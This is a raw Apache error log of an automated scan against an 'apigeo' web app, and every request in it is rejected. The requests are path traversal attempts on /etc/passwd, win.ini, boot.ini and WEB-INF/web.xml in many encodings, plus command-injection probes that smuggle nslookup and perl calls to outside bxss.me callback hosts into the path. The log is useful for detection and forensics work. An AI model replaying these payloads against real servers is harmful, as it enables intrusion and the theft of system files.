[Tue Dec 02 09:47:35.144955 2025] [core:error] [pid 44681] [client 148.113.214.89:59902] AH00126: Invalid URI in request GET /assets/bower_components/jvectormap/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini HTTP/1.1
[Tue Dec 02 09:47:35.668114 2025] [core:error] [pid 44248] [client 148.113.214.89:59951] AH00126: Invalid URI in request GET /assets/css/../../../../../../../../boot.ini HTTP/1.1
[Tue Dec 02 09:47:35.914433 2025] [core:error] [pid 44368] [client 148.113.214.89:59959] AH00126: Invalid URI in request GET /assets/bower_components/jvectormap/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1
[Tue Dec 02 09:47:36.103959 2025] [core:error] [pid 44745] [client 148.113.214.89:59930] AH00126: Invalid URI in request GET /assets/css/skins/../../../../../../../../boot.ini HTTP/1.1
[Tue Dec 02 09:47:36.261784 2025] [core:error] [pid 44700] [client 148.113.214.89:59977] AH00126: Invalid URI in request GET /assets/css/........................................................................../../../../../../../../windows/win.ini HTTP/1.1
[Tue Dec 02 09:47:36.835150 2025] [core:error] [pid 44744] [client 148.113.214.89:59994] AH00126: Invalid URI in request GET /assets/css/skins/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini HTTP/1.1
[Tue Dec 02 09:47:37.461374 2025] [core:error] [pid 44239] [client 148.113.214.89:60028] AH00126: Invalid URI in request GET /assets/bower_components/bootstrap/dist/css/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini HTTP/1.1
[Tue Dec 02 09:47:38.320686 2025] [core:error] [pid 44746] [client 148.113.214.89:60017] AH00126: Invalid URI in request GET /assets/css/skins/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1
[Tue Dec 02 09:47:38.703680 2025] [core:error] [pid 44745] [client 148.113.214.89:60067] AH00126: Invalid URI in request GET /assets/bower_components/jvectormap/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
[Tue Dec 02 09:47:39.294250 2025] [core:error] [pid 44259] [client 148.113.214.89:60105] AH00126: Invalid URI in request GET /assets/bower_components/bootstrap/dist/css/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1
[Tue Dec 02 09:47:39.744602 2025] [core:error] [pid 44584] [client 148.113.214.89:60049] AH00126: Invalid URI in request GET /assets/css/skins/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
[Tue Dec 02 09:47:40.076036 2025] [core:error] [pid 44314] [client 148.113.214.89:60132] AH00126: Invalid URI in request GET /assets/bower_components/bootstrap/dist/css/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
[Tue Dec 02 09:47:40.558106 2025] [core:error] [pid 44169] [client 148.113.214.89:60154] AH00126: Invalid URI in request GET /assets/css/skins/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini HTTP/1.1
[Tue Dec 02 09:47:41.116522 2025] [core:error] [pid 44584] [client 148.113.214.89:60178] AH00126: Invalid URI in request GET /assets/plugins/pace/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini HTTP/1.1
[Tue Dec 02 09:47:41.248348 2025] [core:error] [pid 44227] [client 148.113.214.89:60171] AH00126: Invalid URI in request GET /assets/bower_components/bootstrap/dist/css/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini HTTP/1.1
[Tue Dec 02 09:47:42.517919 2025] [core:error] [pid 44084] [client 148.113.214.89:60244] AH00126: Invalid URI in request GET /icons/........................................................................../../../../../../../../etc/passwd HTTP/1.1
[Tue Dec 02 09:47:43.102856 2025] [core:error] [pid 44805] (36)File name too long: [client 148.113.214.89:60279] AH00036: access to /;(nslookup hitcagiudsaoh90faf.bxss.me||perl -e "gethostbyname('hitcagiudsaoh90faf.bxss.me')")|(nslookup hitcagiudsaoh90faf.bxss.me||perl -e "gethostbyname('hitcagiudsaoh90faf.bxss.me')")&(nslookup hitcagiudsaoh90faf.bxss.me||perl -e "gethostbyname('hitcagiudsaoh90faf.bxss.me')")/plugins/pace/pace.min.css failed (filesystem path '/var/www/html/apigeo/;(nslookup hitcagiudsaoh90faf.bxss.me||perl -e "gethostbyname('hitcagiudsaoh90faf.bxss.me')")|(nslookup hitcagiudsaoh90faf.bxss.me||perl -e "gethostbyname('hitcagiudsaoh90faf.bxss.me')")&(nslookup hitcagiudsaoh90faf.bxss.me||perl -e "gethostbyname('hitcagiudsaoh90faf.bxss.me')")')
[Tue Dec 02 09:47:43.434975 2025] [core:error] [pid 44687] [client 148.113.214.89:60297] AH00126: Invalid URI in request GET /icons/........................................................................../../../../../../../../windows/win.ini HTTP/1.1
[Tue Dec 02 09:47:43.454387 2025] [core:error] [pid 44246] [client 148.113.214.89:60288] AH00126: Invalid URI in request GET /assets/bower_components/jvectormap/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini HTTP/1.1
[Tue Dec 02 09:47:44.022704 2025] [core:error] [pid 44687] [client 148.113.214.89:60323] AH00126: Invalid URI in request GET /assets/plugins/pace/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1
[Tue Dec 02 09:47:45.260093 2025] [core:error] [pid 44707] [client 148.113.214.89:60378] AH00126: Invalid URI in request GET /assets/plugins/pace/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
[Tue Dec 02 09:47:45.487207 2025] [core:error] [pid 44090] [client 148.113.214.89:60375] AH00126: Invalid URI in request GET /assets/bower_components/Ionicons/css/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../etc/passwd HTTP/1.1
[Tue Dec 02 09:47:46.109086 2025] [core:error] [pid 44370] [client 148.113.214.89:60406] AH00126: Invalid URI in request GET /assets/plugins/pace/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini HTTP/1.1
[Tue Dec 02 09:47:48.115097 2025] [core:error] [pid 44169] [client 148.113.214.89:60510] AH00126: Invalid URI in request GET /assets/bower_components/Ionicons/css/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../windows/win.ini HTTP/1.1
[Tue Dec 02 09:47:49.972402 2025] [core:error] [pid 44746] [client 148.113.214.89:60570] AH00126: Invalid URI in request GET /assets/css/skins/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini HTTP/1.1
[Tue Dec 02 09:47:51.534442 2025] [core:error] [pid 44681] [client 148.113.214.89:60664] AH00126: Invalid URI in request GET /assets/css/skins/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1
[Tue Dec 02 09:47:52.301564 2025] [core:error] [pid 44254] [client 148.113.214.89:60682] AH00126: Invalid URI in request GET /assets/css/skins/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1
[Tue Dec 02 09:47:53.138654 2025] [core:error] [pid 44318] [client 148.113.214.89:60732] AH00126: Invalid URI in request GET /assets/bower_components/bootstrap/dist/css/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1
[Tue Dec 02 09:47:53.391380 2025] [core:error] [pid 44169] [client 148.113.214.89:60747] AH00126: Invalid URI in request GET /assets/css/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini HTTP/1.1
[Tue Dec 02 09:47:54.322390 2025] [core:error] [pid 44370] [client 148.113.214.89:60788] AH00126: Invalid URI in request GET /assets/css/skins/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/windows/win.ini HTTP/1.1
[Tue Dec 02 09:47:54.686429 2025] [core:error] [pid 44746] [client 148.113.214.89:60806] AH00126: Invalid URI in request GET /assets/css/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1
[Tue Dec 02 09:47:54.741211 2025] [core:error] [pid 44318] [client 148.113.214.89:60803] AH00126: Invalid URI in request GET /assets/css/skins/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
[Tue Dec 02 09:47:55.481297 2025] [core:error] [pid 44827] [client 148.113.214.89:60801] AH00126: Invalid URI in request GET /assets/css/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
[Tue Dec 02 09:47:55.986654 2025] [core:error] [pid 44371] [client 148.113.214.89:60846] AH00126: Invalid URI in request GET /assets/plugins/pace/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../etc/passwd HTTP/1.1
[Tue Dec 02 09:47:56.060642 2025] [core:error] [pid 44368] [client 148.113.214.89:60872] AH00126: Invalid URI in request GET /assets/bower_components/bootstrap/dist/css/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/windows/win.ini HTTP/1.1
[Tue Dec 02 09:47:56.278010 2025] [core:error] [pid 44370] [client 148.113.214.89:60883] AH00126: Invalid URI in request GET /assets/css/skins/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini HTTP/1.1
[Tue Dec 02 09:47:56.330956 2025] [core:error] [pid 44254] [client 148.113.214.89:60884] AH00126: Invalid URI in request GET /assets/css/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini HTTP/1.1
[Tue Dec 02 09:47:56.945275 2025] [core:error] [pid 44239] [client 148.113.214.89:60913] AH00126: Invalid URI in request GET /assets/plugins/pace/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../windows/win.ini HTTP/1.1
[Tue Dec 02 09:47:56.968867 2025] [core:error] [pid 44167] [client 148.113.214.89:60900] AH00126: Invalid URI in request GET /assets/css/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../etc/passwd HTTP/1.1
[Tue Dec 02 09:47:57.177616 2025] [core:error] [pid 44583] [client 148.113.214.89:60923] AH00126: Invalid URI in request GET /assets/bower_components/jvectormap/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1
[Tue Dec 02 09:47:58.262550 2025] [core:error] [pid 44246] [client 148.113.214.89:60965] AH00126: Invalid URI in request GET /assets/css/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../windows/win.ini HTTP/1.1
[Tue Dec 02 09:47:58.643953 2025] [core:error] [pid 44245] [client 148.113.214.89:60973] AH00126: Invalid URI in request GET /assets/bower_components/jvectormap/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/windows/win.ini HTTP/1.1
[Tue Dec 02 09:48:00.598368 2025] [core:error] [pid 44707] [client 148.113.214.89:61024] AH00126: Invalid URI in request GET /assets/bower_components/Ionicons/css/../../../../../../../../etc/passwd%C0%80.jsp HTTP/1.1
[Tue Dec 02 09:48:01.880663 2025] [core:error] [pid 44167] [client 148.113.214.89:61079] AH00126: Invalid URI in request GET /assets/bower_components/Ionicons/css/../../../../../../../../windows/win.ini%C0%80.jsp HTTP/1.1
[Tue Dec 02 09:48:02.154343 2025] [core:error] [pid 44370] [client 148.113.214.89:61112] AH00126: Invalid URI in request GET /assets/plugins/pace/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1
[Tue Dec 02 09:48:02.647384 2025] [core:error] [pid 44687] [client 148.113.214.89:61127] AH00126: Invalid URI in request GET /assets/plugins/pace/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/windows/win.ini HTTP/1.1
[Tue Dec 02 09:48:04.011131 2025] [core:error] [pid 44661] [client 148.113.214.89:61157] AH00126: Invalid URI in request GET /assets/css/skins/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1
[Tue Dec 02 09:48:04.061058 2025] [core:error] [pid 44574] (36)File name too long: [client 148.113.214.89:61189] AH00036: access to /assets/;(nslookup hitembulysylx2be63.bxss.me||perl -e "gethostbyname('hitembulysylx2be63.bxss.me')")|(nslookup hitembulysylx2be63.bxss.me||perl -e "gethostbyname('hitembulysylx2be63.bxss.me')")&(nslookup hitembulysylx2be63.bxss.me||perl -e "gethostbyname('hitembulysylx2be63.bxss.me')")/pace/pace.min.css failed (filesystem path '/var/www/html/apigeo/assets/;(nslookup hitembulysylx2be63.bxss.me||perl -e "gethostbyname('hitembulysylx2be63.bxss.me')")|(nslookup hitembulysylx2be63.bxss.me||perl -e "gethostbyname('hitembulysylx2be63.bxss.me')")&(nslookup hitembulysylx2be63.bxss.me||perl -e "gethostbyname('hitembulysylx2be63.bxss.me')")')
[Tue Dec 02 09:48:05.119806 2025] [core:error] [pid 44370] [client 148.113.214.89:61197] AH00126: Invalid URI in request GET /assets/css/skins/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/windows/win.ini HTTP/1.1
[Tue Dec 02 09:48:06.120491 2025] [core:error] [pid 44370] [client 148.113.214.89:61270] AH00126: Invalid URI in request GET /assets/bower_components/bootstrap/dist/css/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd HTTP/1.1
[Tue Dec 02 09:48:06.634953 2025] [core:error] [pid 44574] [client 148.113.214.89:61285] AH00126: Invalid URI in request GET /assets/css/../../../../../../../../etc/passwd%C0%80.jsp HTTP/1.1
[Tue Dec 02 09:48:07.015179 2025] [core:error] [pid 44245] [client 148.113.214.89:61292] AH00126: Invalid URI in request GET /icons/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../etc/passwd HTTP/1.1
[Tue Dec 02 09:48:08.039916 2025] [core:error] [pid 44246] [client 148.113.214.89:61331] AH00126: Invalid URI in request GET /assets/css/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1
[Tue Dec 02 09:48:08.727565 2025] [core:error] [pid 44371] [client 148.113.214.89:61345] AH00126: Invalid URI in request GET /assets/css/../../../../../../../../windows/win.ini%C0%80.jsp HTTP/1.1
[Tue Dec 02 09:48:09.416449 2025] [core:error] [pid 44583] [client 148.113.214.89:61378] AH00126: Invalid URI in request GET /assets/css/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/windows/win.ini HTTP/1.1
[Tue Dec 02 09:48:09.801261 2025] [core:error] [pid 44827] [client 148.113.214.89:61390] AH00126: Invalid URI in request GET /assets/plugins/pace/../../../../../../../../etc/passwd%C0%80.jsp HTTP/1.1
[Tue Dec 02 09:48:10.384152 2025] [core:error] [pid 44069] [client 148.113.214.89:61424] AH00126: Invalid URI in request GET /icons/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../windows/win.ini HTTP/1.1
[Tue Dec 02 09:48:12.183737 2025] [core:error] [pid 44707] [client 148.113.214.89:61484] AH00126: Invalid URI in request GET /assets/plugins/pace/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd HTTP/1.1
[Tue Dec 02 09:48:12.394841 2025] [core:error] [pid 44166] [client 148.113.214.89:61501] AH00126: Invalid URI in request GET /assets/css/skins/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd HTTP/1.1
[Tue Dec 02 09:48:13.301620 2025] [core:error] [pid 44443] [client 148.113.214.89:61535] AH00126: Invalid URI in request GET /assets/plugins/pace/../../../../../../../../windows/win.ini%C0%80.jsp HTTP/1.1
[Tue Dec 02 09:48:13.400454 2025] [core:error] [pid 44989] [client 148.113.214.89:61509] AH00126: Invalid URI in request GET /assets/bower_components/jvectormap/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd HTTP/1.1
[Tue Dec 02 09:48:15.070940 2025] [core:error] [pid 44669] (36)File name too long: [client 148.113.214.89:61507] AH00036: access to /;(nslookup hitfowsplduvybb2af.bxss.me||perl -e "gethostbyname('hitfowsplduvybb2af.bxss.me')")|(nslookup hitfowsplduvybb2af.bxss.me||perl -e "gethostbyname('hitfowsplduvybb2af.bxss.me')")&(nslookup hitfowsplduvybb2af.bxss.me||perl -e "gethostbyname('hitfowsplduvybb2af.bxss.me')")/css/skins/_all-skins.min.css failed (filesystem path '/var/www/html/apigeo/;(nslookup hitfowsplduvybb2af.bxss.me||perl -e "gethostbyname('hitfowsplduvybb2af.bxss.me')")|(nslookup hitfowsplduvybb2af.bxss.me||perl -e "gethostbyname('hitfowsplduvybb2af.bxss.me')")&(nslookup hitfowsplduvybb2af.bxss.me||perl -e "gethostbyname('hitfowsplduvybb2af.bxss.me')")')
[Tue Dec 02 09:48:17.457520 2025] [core:error] [pid 44746] [client 148.113.214.89:61683] AH00126: Invalid URI in request GET /assets/css/skins/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd HTTP/1.1
[Tue Dec 02 09:48:19.272813 2025] [core:error] [pid 44041] (36)File name too long: [client 148.113.214.89:61749] AH00036: access to /assets/plugins/;(nslookup hitemnbrubhvuf2cec.bxss.me||perl -e "gethostbyname('hitemnbrubhvuf2cec.bxss.me')")|(nslookup hitemnbrubhvuf2cec.bxss.me||perl -e "gethostbyname('hitemnbrubhvuf2cec.bxss.me')")&(nslookup hitemnbrubhvuf2cec.bxss.me||perl -e "gethostbyname('hitemnbrubhvuf2cec.bxss.me')")/pace.min.css failed (filesystem path '/var/www/html/apigeo/assets/plugins/;(nslookup hitemnbrubhvuf2cec.bxss.me||perl -e "gethostbyname('hitemnbrubhvuf2cec.bxss.me')")|(nslookup hitemnbrubhvuf2cec.bxss.me||perl -e "gethostbyname('hitemnbrubhvuf2cec.bxss.me')")&(nslookup hitemnbrubhvuf2cec.bxss.me||perl -e "gethostbyname('hitemnbrubhvuf2cec.bxss.me')")')
[Tue Dec 02 09:48:19.650460 2025] [core:error] [pid 44443] [client 148.113.214.89:61711] AH00126: Invalid URI in request GET /icons/../../../../../../../../etc/passwd%C0%80.jsp HTTP/1.1
[Tue Dec 02 09:48:22.736235 2025] [core:error] [pid 44443] [client 148.113.214.89:61878] AH00126: Invalid URI in request GET /icons/../../../../../../../../windows/win.ini%C0%80.jsp HTTP/1.1
[Tue Dec 02 09:48:26.578869 2025] [core:error] [pid 44090] [client 148.113.214.89:62010] AH00126: Invalid URI in request GET /assets/css/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd HTTP/1.1
[Tue Dec 02 09:48:28.045729 2025] [core:error] [pid 44246] (36)File name too long: [client 148.113.214.89:62077] AH00036: access to /assets/;(nslookup hitihpscgxzedb1735.bxss.me||perl -e "gethostbyname('hitihpscgxzedb1735.bxss.me')")|(nslookup hitihpscgxzedb1735.bxss.me||perl -e "gethostbyname('hitihpscgxzedb1735.bxss.me')")&(nslookup hitihpscgxzedb1735.bxss.me||perl -e "gethostbyname('hitihpscgxzedb1735.bxss.me')")/skins/_all-skins.min.css failed (filesystem path '/var/www/html/apigeo/assets/;(nslookup hitihpscgxzedb1735.bxss.me||perl -e "gethostbyname('hitihpscgxzedb1735.bxss.me')")|(nslookup hitihpscgxzedb1735.bxss.me||perl -e "gethostbyname('hitihpscgxzedb1735.bxss.me')")&(nslookup hitihpscgxzedb1735.bxss.me||perl -e "gethostbyname('hitihpscgxzedb1735.bxss.me')")')
[Tue Dec 02 09:48:32.039952 2025] [core:error] [pid 44166] [client 148.113.214.89:62231] AH00126: Invalid URI in request GET /assets/css/../../../WEB-INF/web.xml? HTTP/1.1
[Tue Dec 02 09:48:34.111580 2025] [core:error] [pid 44574] [client 148.113.214.89:62305] AH00126: Invalid URI in request GET /assets/css/../../../WEB-INF/web.xml%C0%80.jsp HTTP/1.1
[Tue Dec 02 09:48:44.719355 2025] [core:error] [pid 45121] [client 148.113.214.89:62733] AH00126: Invalid URI in request GET /icons/../../WEB-INF/web.xml? HTTP/1.1
[Tue Dec 02 09:48:48.866427 2025] [core:error] [pid 44169] [client 148.113.214.89:62903] AH00126: Invalid URI in request GET /icons/../../WEB-INF/web.xml%C0%80.jsp HTTP/1.1
[Tue Dec 02 09:48:50.960543 2025] [core:error] [pid 44443] [client 148.113.214.89:62963] AH00126: Invalid URI in request GET /assets/bower_components/font-awesome/css/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../etc/passwd HTTP/1.1
[Tue Dec 02 09:48:52.549066 2025] [core:error] [pid 44245] [client 148.113.214.89:63009] AH00126: Invalid URI in request GET /icons/../../../WEB-INF/web.xml? HTTP/1.1
[Tue Dec 02 09:48:53.557871 2025] [core:error] [pid 44610] [client 148.113.214.89:63062] AH00126: Invalid URI in request GET /assets/bower_components/font-awesome/css/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../windows/win.ini HTTP/1.1
[Tue Dec 02 09:48:55.372610 2025] [core:error] [pid 44069] [client 148.113.214.89:63130] AH00126: Invalid URI in request GET /icons/../../../WEB-INF/web.xml%C0%80.jsp HTTP/1.1
[Tue Dec 02 09:48:56.313442 2025] [authz_core:error] [pid 44245] [client 148.113.214.89:63165] AH01630: client denied by server configuration: /var/www/html/apigeo/system
[Tue Dec 02 09:48:57.654031 2025] [core:error] [pid 44090] (36)File name too long: [client 148.113.214.89:63208] AH00036: access to /;(nslookup hitiecjdifcun897e9.bxss.me||perl -e "gethostbyname('hitiecjdifcun897e9.bxss.me')")|(nslookup hitiecjdifcun897e9.bxss.me||perl -e "gethostbyname('hitiecjdifcun897e9.bxss.me')")&(nslookup hitiecjdifcun897e9.bxss.me||perl -e "gethostbyname('hitiecjdifcun897e9.bxss.me')")/bower_components/jvectormap/jquery-jvectormap.css failed (filesystem path '/var/www/html/apigeo/;(nslookup hitiecjdifcun897e9.bxss.me||perl -e "gethostbyname('hitiecjdifcun897e9.bxss.me')")|(nslookup hitiecjdifcun897e9.bxss.me||perl -e "gethostbyname('hitiecjdifcun897e9.bxss.me')")&(nslookup hitiecjdifcun897e9.bxss.me||perl -e "gethostbyname('hitiecjdifcun897e9.bxss.me')")')
[Tue Dec 02 09:49:07.170878 2025] [core:error] [pid 44318] [client 148.113.214.89:63557] AH00126: Invalid URI in request GET /../../../../../../../../etc/passwd HTTP/1.1
[Tue Dec 02 09:49:08.131480 2025] [core:error] [pid 44090] [client 148.113.214.89:63595] AH00126: Invalid URI in request GET /../../../../../../../../windows/win.ini HTTP/1.1
[Tue Dec 02 09:49:10.516592 2025] [core:error] [pid 44318] [client 148.113.214.89:63654] AH00126: Invalid URI in request GET /assets/bower_components/font-awesome/css/........................................................................../../../../../../../../etc/passwd HTTP/1.1
[Tue Dec 02 09:49:11.769978 2025] [core:error] [pid 44574] [client 148.113.214.89:63696] AH00126: Invalid URI in request GET /assets/bower_components/font-awesome/css/........................................................................../../../../../../../../windows/win.ini HTTP/1.1
[Tue Dec 02 09:49:13.668532 2025] [core:error] [pid 44318] [client 148.113.214.89:63783] AH00126: Invalid URI in request GET /assets/css/../../../Gemfile HTTP/1.1
